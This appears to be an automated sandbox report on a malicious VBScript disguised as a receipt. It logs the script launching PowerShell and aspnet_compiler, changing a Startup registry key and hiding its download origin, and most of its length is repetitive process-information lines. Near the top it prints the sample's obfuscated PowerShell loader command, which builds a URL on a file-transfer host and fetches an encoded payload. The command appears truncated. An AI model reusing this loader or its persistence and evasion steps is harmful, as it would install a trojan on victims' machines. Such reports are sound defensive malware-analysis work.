Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210914

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_504w00vk.dm5.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@8/10@26/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\14 Items receipt.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb'G source: powershell.exe, 00000003.00000003.774854089.000001BADF727000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000003.774854089.000001BADF727000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POwerSheLL $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'", "0", "true");

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252	Thread sleep time: -8301034833169293s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5848	Thread sleep time: -14757395258967632s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4239	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5072	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1973
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 7251
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: foregroundWindowGot 632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: foregroundWindowGot 684

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

